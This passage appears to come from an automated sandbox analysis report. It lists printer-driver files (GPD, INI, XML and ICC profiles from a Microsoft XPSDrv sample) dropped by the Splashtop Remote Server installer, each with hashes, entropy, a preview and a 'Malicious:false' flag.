                                                                                                                                                                                                                                                                                                                                  Preview: ....Copyright (c) 2005 Microsoft Corporation....All rights reserved.....THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..PARTICULAR PURPOSE.....File Name:.... xdsmpl-pipelineconfig.xml....Abstract:.... XPSDrv sample driver filter configuration file. This identifies the.. filters that comprise the filter pipeline and their order.....-->....<Filters>.. <Filter dll = "XDWMark.dll".. clsid = "{B8B525BF-F147-460a-B2D5-9DFB1F30D0FD}".. name = "Watermark filter">.. <Input guid = "{b8cf8530-5562-47c4-ab67-b1f69ecf961e}" comment="IID_IXpsDocumentProvider"/>.. <Output guid = "{4368d8a2-4181-4a9f-b295-3d9a38bb9ba0}" comment="IID_IXpsDocumentConsumer"/>.. </Filter>.. <Filter dll = "XDScale.dll".. clsid = "{976EDCE4-274E-482a-97

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\xdsmpl.gpd

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11986
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.7262628705263445
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:3HDc4F4V4U4k4v4g4L4wfyPUc5Bn+vjdQjNuDVjFfJCk72sI/72sIPTZGjo2D:KyPUc5Bn+bdsN4jFfJR25T25wZ
                                                                                                                                                                                                                                                                                                                                  MD5:E1F2A2FD0D41438A375F0DDC1822AA7C
                                                                                                                                                                                                                                                                                                                                  SHA1:267F8BFFABCCA4D46556519C105C0C6055B6F6D0
                                                                                                                                                                                                                                                                                                                                  SHA-256:606E0918952F5441D31F5335F09FD6AACAE0A5850A0174280FF34F6772A0B768
                                                                                                                                                                                                                                                                                                                                  SHA-512:1CF4B1E989819ECB134DCBD9C842F69D97A4949ED319D712BF14729C8A0BE0FF22122E3FADC4F4B2A86916F5EBF717E5CCE6E7620DD90EA73551CB523703EC0C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdsmpl.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver main GPD file...*%....*GPDFileVersion: "1.2"..*GPDSpecVersion: "1.2"..*GPDFileName: "XDSmpl.gpd"..*Include: "msxpsinc.gpd"..*Include: "StdNames.gpd"..*Include: "xdnames.gpd"..*Include: "xdwmark.gpd"..*Include: "xdbook.gpd"..*Include: "xdcolman.gpd"..*Include: "xdnup.gpd"..*Include: "xdpgscl.gpd"..*ModelName: "XPSDrv Sample Driver"..*MasterUnits: PAIR(1200, 1200)..*ResourceDLL: "unires.dll"..*PrinterType: PAGE..*MaxCopies: 1....*%*********************************************************************

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\xdsmpl.ini

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):475
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.248799523355892
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:fp+BF8aNytrHLCSKsSHUJhGbkxIESnPEcF4RqWo40nUv:fp+D8MkHLNKsSyh2kBoP3FsqA02
                                                                                                                                                                                                                                                                                                                                  MD5:2EFCEBC23D661F3BFA0A4A4BE0588466
                                                                                                                                                                                                                                                                                                                                  SHA1:1ED92AEC943CFE143A7DBBCE2A82141D67FB9169
                                                                                                                                                                                                                                                                                                                                  SHA-256:DC50AFD088B0D72935D0CDF8F99071A7C80A4979BC9AF915016DD847F222EBE9
                                                                                                                                                                                                                                                                                                                                  SHA-512:FC1FF31E2CBFA1BC8A825548C6C4661236FAF12D8B75F25010E783DE116FC48B61F0188A4673C2C60A52181F6E7F0EFE39BF9B0A7D35B1937EC02B97FCCB7955
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:;..; Copyright (c) 2005 Microsoft Corporation..;..; All rights reserved...;..; THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..; ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..; THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..; PARTICULAR PURPOSE...;..; File Name:..;..; xdsmpl.ini..;..; Abstract:..;..; XPSDrv sample driver configuration file for UI plug-in...;....[OEMFiles]..OEMConfigFile1=xdsmplui.DLL......

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\xdwmark.gpd

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1554
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.555759044915239
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:FCDZkHSs9/9Tmm8LYReOR1RwrRpRajx8LZRzQRVRC:sDuHnmmoYRVR1RwrRpRajxoZRcRVRC
                                                                                                                                                                                                                                                                                                                                  MD5:C922269B15071195905ACE600AC9B02C
                                                                                                                                                                                                                                                                                                                                  SHA1:BCC559EBBFCAC61A67905B5DBB9D3E8E27D413E5
                                                                                                                                                                                                                                                                                                                                  SHA-256:2FC61A7629E0382699E8178AC8131666BB1BADA65F9B7AC738E7620C1D3A4E40
                                                                                                                                                                                                                                                                                                                                  SHA-512:C4ACE0F94150ED02580A365798981FD30484B3E13576624620377F077AD4A6C0AA06ED3DBC1B8A64406F357321A9AD027A1A12D9C98A407D27B58CA857D74E84
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdwmark.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver watermark specific GPD settings...*%....*%******************************************************************************..*% PageWatermark..*%******************************************************************************..*Feature: PageWatermarkType..{.. *rcNameID: =IDS_GPD_WATERMARKTYPE.. *DefaultOption: None.... *Option: None.. {.. *rcNameID: =IDS_GPD_NONE.. }.... *Option: Text.. {.. *rcNameID: =IDS_GPD_TEXT.. }.... *Option: Raster.. {.. *rcNameID: =IDS_GPD_RASTERIMAGE.. }.... *Option: Ve

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\xdwscRGB.icc

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Microsoft color profile 2.2, type lino, RGB/Lab-spac device by MSFT, 124856 bytes, 10-5-2006 12:14:35 "Created by Microsoft WCS from DMP: scRGB virtual device model profile, CAMP: Default sRGB monitor, and GMMP: Default Gamut M"
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):124856
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.796177094859484
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:wq47C9ZJMKkyYHlMRyu2FK0MjUq2mX14F4Q7asMM06KI:w29bMPyASyumQwmleHf91
                                                                                                                                                                                                                                                                                                                                  MD5:45CC4B43673056B8625ADD43EFDF33DD
                                                                                                                                                                                                                                                                                                                                  SHA1:2A7E28C7696CAF775344A31A23DCDADF15A5F1BD
                                                                                                                                                                                                                                                                                                                                  SHA-256:089BE57682C9F866DCCE74E1D174AA9816BC0992C1CE6EC01E03958964EF852A
                                                                                                                                                                                                                                                                                                                                  SHA-512:08A1FEA06EED5B874BE487F0F523ADCB98262FFA7158F54A724963827ACBF6318EEE99948AEB999C6F6EF875EA04E2B2377CBE623BB4679FB90BE785C75560DC
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:...lino. ..spacRGB Lab ...........#acspMSFT...................................-MSFT................................................desc......."cprt.......1wtpt...$....A2B0...8...ZB2A0.......ZMS00..U.....desc........Created by Microsoft WCS from DMP: scRGB virtual device model profile, CAMP: Default sRGB monitor, and GMMP: Default Gamut Map Model Profile for photos.enUS....C.r.e.a.t.e.d. .b.y. .M.i.c.r.o.s.o.f.t. .W.C.S. .f.r.o.m. .D.M.P.:. .s.c.R.G.B. .v.i.r.t.u.a.l. .d.e.v.i.c.e. .m.o.d.e.l. .p.r.o.f.i.l.e.,. .C.A.M.P.:. .D.e.f.a.u.l.t. .s.R.G.B. .m.o.n.i.t.o.r.,. .a.n.d. .G.M.M.P.:. .D.e.f.a.u.l.t. .G.a.m.u.t. .M.a.p. .M.o.d.e.l. .P.r.o.f.i.l.e. .f.o.r. .p.h.o.t.o.s...........................................................................text....Copyright (c) 2004 Microsoft Corporation....XYZ .......T........mft2................................................BeBwB.B.B.B.B.B.B.C.C.C"C3CECVCgCxC.C.C.C.C.C.C.D.D.D$D5DFDWDhDzD.D.D.D.D.D.D.E.E.E%E6EHEYEjE{E.E.E.E.E.E.E.F.F.F'F8FIFZFlF}

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\xdCMYKPrinter.icc

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Microsoft color profile 2.2, type lino, CMYK/Lab-prtr device by MSFT, 849080 bytes, 10-5-2006 15:02:14 "Created by Microsoft WCS from DMP: CMYKPrinter.cdmp, CAMP: Default sRGB monitor, and GMMP: Default Gamut Map Model Profile f"
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):849080
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.924819797081704
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:nupHTMj2vkdYa+kYfwx+rbgal21W0M5SU1yr2U5fOFQw8LHxrLiYJVarTH46xL1F:upgavkz+UIUBRm020G7
                                                                                                                                                                                                                                                                                                                                  MD5:8EE08E7B69A5F2ECA6BB3A5EEDB48649
                                                                                                                                                                                                                                                                                                                                  SHA1:FF7CFA21BDCB220EC0450E76A1C2AB0854CAEBD6
                                                                                                                                                                                                                                                                                                                                  SHA-256:2B215C1FA5CAA10582BDAFE6B51A911C9D8B2B0B456EEEFF955064FDC3844D98
                                                                                                                                                                                                                                                                                                                                  SHA-512:12AEA33F800D5203811DE1FFA1181BD1B8A58C54BD52A9D2BF7A4084CC2BBC52C9E74E9434C41C6B1EB2CA451E81D5E11B3CE6B827BA4B0F14927EB4FAD62FF0
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:....lino. ..prtrCMYKLab ............acspMSFT...................................-MSFT................................................desc........cprt.......1wtpt...,....A2B0...@....B2A0........A2B1...@....A2B2...@....B2A1........B2A2........gamt..^.....MS00...P..gfdesc........Created by Microsoft WCS from DMP: CMYKPrinter.cdmp, CAMP: Default sRGB monitor, and GMMP: Default Gamut Map Model Profile for photos...enUS....C.r.e.a.t.e.d. .b.y. .M.i.c.r.o.s.o.f.t. .W.C.S. .f.r.o.m. .D.M.P.:. .C.M.Y.K.P.r.i.n.t.e.r...c.d.m.p.,. .C.A.M.P.:. .D.e.f.a.u.l.t. .s.R.G.B. .m.o.n.i.t.o.r.,. .a.n.d. .G.M.M.P.:. .D.e.f.a.u.l.t. .G.a.m.u.t. .M.a.p. .M.o.d.e.l. .P.r.o.f.i.l.e. .f.o.r. .p.h.o.t.o.s...........................................................................text....Copyright (c) 2004 Microsoft Corporation....XYZ .......c........mft2................................................................................................................ !!""##$$%%&&''(())**++,,--..//00112233445566778899

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\xdbook.gpd

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1808
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.525972600570173
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:FCDZkHSs9/9QltHlRIORmRCjR73RpRvrmRCgORmRCjR73RpRS:sDuH87FRDRmRCjRrRpRvrmRCbRmRCjRI
                                                                                                                                                                                                                                                                                                                                  MD5:9303837EFF41196B0FC3D6AD46FE43AF
                                                                                                                                                                                                                                                                                                                                  SHA1:9AFBCA730F3A98C5C43AC1AF156BCD6C3CE366E5
                                                                                                                                                                                                                                                                                                                                  SHA-256:ABD2E8A90B9949D61DF21DF88AED7040542555A0228BB0B375439F8488A06294
                                                                                                                                                                                                                                                                                                                                  SHA-512:9F8C9956CEB14B7A275B346A48A1C010DEB23D94BAB4E0FFD395D23B5573533EB80630092CA6A458D33762E55C260752CA294B5E0632179ECC18F17A0B961D55
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdbook.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver Booklet specific GPD settings...*%....*%******************************************************************************..*% JobBindAllDocuments..*%******************************************************************************..*Feature: JobBindAllDocuments..{.. *rcNameID: =IDS_GPD_JOBBINDING.. *DefaultOption: None.... *Option: None.. {.. *rcNameID: =IDS_GPD_NONE.. }.... *Option: BindLeft.. {.. *rcNameID: =IDS_GPD_LTOR.. }.... *Option: BindRight.. {.. *rcNameID: =IDS_GPD_RTOL.. }.... *Option:

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\xdcolman.gpd

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2718
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.658165462032682
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:FCDZkHSs9/9xmSx8iZR/+eRxSRURJPRo/8nRFGR7RrXh8TpR9KbzkR5BMLkRWkc4:sDuHN/DRFRkRURJPRo/ARYR7Rrx+R98+
                                                                                                                                                                                                                                                                                                                                  MD5:3F80884F3D1F3B9D5D3C7279131ECB4D
                                                                                                                                                                                                                                                                                                                                  SHA1:17AB016E8AFA453B5A7DA19A6F2AB6AE0B3D78F4
                                                                                                                                                                                                                                                                                                                                  SHA-256:4D09EE22E6A9BFB33E13F5391830FFDA13A572DC6DA1E22D1DEE3D4CAD7BBBD9
                                                                                                                                                                                                                                                                                                                                  SHA-512:363579BDE28329209801FFA7EE0A3A5DD4278886453221768D2F3D7A1ECFE348884004FA08F9B6006E35A6098B72F1738B7B425C9AC8F5F2ACBDC5FD26EEA50A
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdcolman.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver Color Management specific GPD settings...*%....*%******************************************************************************..*% PageColorManagement..*%******************************************************************************..*Feature: PageColorManagement..{.. *rcNameID: =IDS_GPD_PAGECOLMAN.. *DefaultOption: None.. *PrintSchemaKeywordMap: "PageColorManagement".... *Option: None.. {.. *rcNameID: =IDS_GPD_NONE.. *PrintSchemaKeywordMap: "None".. }.... *Option: Device.. {.. *rcNameID: =IDS_GPD_D

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\xdnames.gpd

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):6871
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6709110049190015
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:sDuHL5cq9ORGELoQ+4JH3U/y5EDeP8N4f6TfSqXYY0s9DOS:3HL5G0Ex+AX0yAePzO0S
                                                                                                                                                                                                                                                                                                                                  MD5:9196C9FAF999C94DA04F4679E823D753
                                                                                                                                                                                                                                                                                                                                  SHA1:BF4445CFF27EC04248BB645C74AAAF6B1EE95B6D
                                                                                                                                                                                                                                                                                                                                  SHA-256:411DFDB99C624831D1E755AD5D861ECE1C2EFCEF23A6C7F89F6C2BA251BBED0A
                                                                                                                                                                                                                                                                                                                                  SHA-512:94A3C1F51B03A91220F9AEF9D8BDDAB6DAD74BE971D5D16B5B308DC5403DE1AFCB3A8D40E0F48CEC1834DE596192BED99C78B03B2538A9594B99347B589650B1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdnames.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver GPD resource names...*%....*CodePage: 1252 *% Windows 3.1 US (ANSI) code page....*Feature: RESDLL..{.. *Name: "resource dll files".. *ConcealFromUI?: TRUE.... *Option: UniresDLL.. {.. *Name: "unires.dll".. }.. *Option: xdsmplui.. {.. *Name: "xdsmplui.dll".. }..}....*Macros: StdFeatureNames..{.. IDS_GPD_1PPS: RESDLL.xdsmplui.2000.. IDS_GPD_2PPS: RESDLL.xdsmplui.2001.. IDS_GPD_4PPS: RESDLL.xdsmplui.2002.. IDS_GPD_6PPS: RESDLL.xdsmplui.2003.. IDS_GPD_8PPS:

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\xdnup.gpd

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4068
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.508459493570281
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:sDuHqDYRxRGRDRPRbRERfRSdg9Re9RxjR4RURFRjjRkRSRA1sogRyRGRDRPRbREN:3HqZtgst0P
                                                                                                                                                                                                                                                                                                                                  MD5:CFFD55A27BDF496CABE9C41E80A42A72
                                                                                                                                                                                                                                                                                                                                  SHA1:09225D86A48948152DE3AF346491B893579253CA
                                                                                                                                                                                                                                                                                                                                  SHA-256:D0B69D3877190BFAFCADB90D9D4F6C81DA15CD5E3CBE45BAB4E60BC812FF32C0
                                                                                                                                                                                                                                                                                                                                  SHA-512:D1F0A7C72657897B2394D8C166D4E079CAB6CC3BE35621A8B014F541A1A73245DDD0865C4AE810E1784AC973AEA0419F7DFC42DA42A5B81284B539DC0A24EB29
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdnup.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver NUp specific GPD settings...*%....*%******************************************************************************..*% JobNUpAllDocumentsContiguously..*%******************************************************************************..*Feature: JobNUpAllDocumentsContiguously..{.. *rcNameID: =IDS_GPD_JOBNUP.. *DefaultOption: 1.. *PrintSchemaKeywordMap: "JobNUpAllDocumentsContiguously".... *Option: 1.. {.. *rcNameID: =IDS_GPD_1PPS.. }.... *Option: 2.. {.. *rcNameID: =IDS_GPD_2PPS.. }.... *Option: 4.. {..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\xdpgscl.gpd

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2522
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.708364933060842
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:FCDZkHSs9/9Ydp88+qRIOR3NRXRAR6R5eR7RZboRaYipRazRapjRafRa6RamRaRA:sDuHco4RDR3NRXRAR6R5eR7RZboRaYuY
                                                                                                                                                                                                                                                                                                                                  MD5:F492FC30EFAE3C1548C17D4419E37778
                                                                                                                                                                                                                                                                                                                                  SHA1:887F31639800999D7225AF1EE3F26B601D726401
                                                                                                                                                                                                                                                                                                                                  SHA-256:08FF54CC8DC7E978B8129017307F4455025FC37F891A9EE6CAD37ADA5EB0CEC7
                                                                                                                                                                                                                                                                                                                                  SHA-512:0F354DBC8B430B168EBAA1BBBAE48DFC6DD285912C1324673BD04AFBDD2947CC3BA8448B440337655377A43A40DC9592CDE26F71A635EEB12746877971C5519D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdpgscl.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver page scaling specific GPD settings...*%....*%******************************************************************************..*% PageScaling..*%******************************************************************************..*Feature: PageScaling..{.. *rcNameID: =IDS_GPD_PAGESCALING.. *DefaultOption: None.... *Option: None.. {.. *rcNameID: =IDS_GPD_NONE.. }.... *Option: Custom.. {.. *rcNameID: =IDS_GPD_CUSTOM.. }.... *Option: CustomSquare.. {.. *rcNameID: =IDS_GPD_CUSTSQUARE.. }.... *Option:

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\xdsmpl-PipelineConfig.xml

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:exported SGML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2476
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.158189280019379
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:qDG8kHYKsJyhBk//ojAd+6IG0c9RLN0KUvfaZhcLNhpMubDUHeLNq63PfaZhcLNM:qDhkHtsI4aV46+ZhOb2tZhzZh7jZh/v
                                                                                                                                                                                                                                                                                                                                  MD5:B628B4F8CC199D26E18FE27BD4A29BBD
                                                                                                                                                                                                                                                                                                                                  SHA1:CBB6FB510D708AE85CC0F715617BCD788A613727
                                                                                                                                                                                                                                                                                                                                  SHA-256:12DCC665FDEFEE3D3D771F5727F86FB812C606FCE0E7A3DA943A2072295D2984
                                                                                                                                                                                                                                                                                                                                  SHA-512:825E8583B140C3CA5C44669AAAEF7654A90977F15FD0959FC17DEE30E18C3275EDFE2366A5C90CE707AF28951A56194CBA0CBEE6967CD95FA9CA8CFD6EF189F3
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview: ....Copyright (c) 2005 Microsoft Corporation....All rights reserved.....THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..PARTICULAR PURPOSE.....File Name:.... xdsmpl-pipelineconfig.xml....Abstract:.... XPSDrv sample driver filter configuration file. This identifies the.. filters that comprise the filter pipeline and their order.....-->....<Filters>.. <Filter dll = "XDWMark.dll".. clsid = "{B8B525BF-F147-460a-B2D5-9DFB1F30D0FD}".. name = "Watermark filter">.. <Input guid = "{b8cf8530-5562-47c4-ab67-b1f69ecf961e}" comment="IID_IXpsDocumentProvider"/>.. <Output guid = "{4368d8a2-4181-4a9f-b295-3d9a38bb9ba0}" comment="IID_IXpsDocumentConsumer"/>.. </Filter>.. <Filter dll = "XDScale.dll".. clsid = "{976EDCE4-274E-482a-97

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\xdsmpl.gpd

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11986
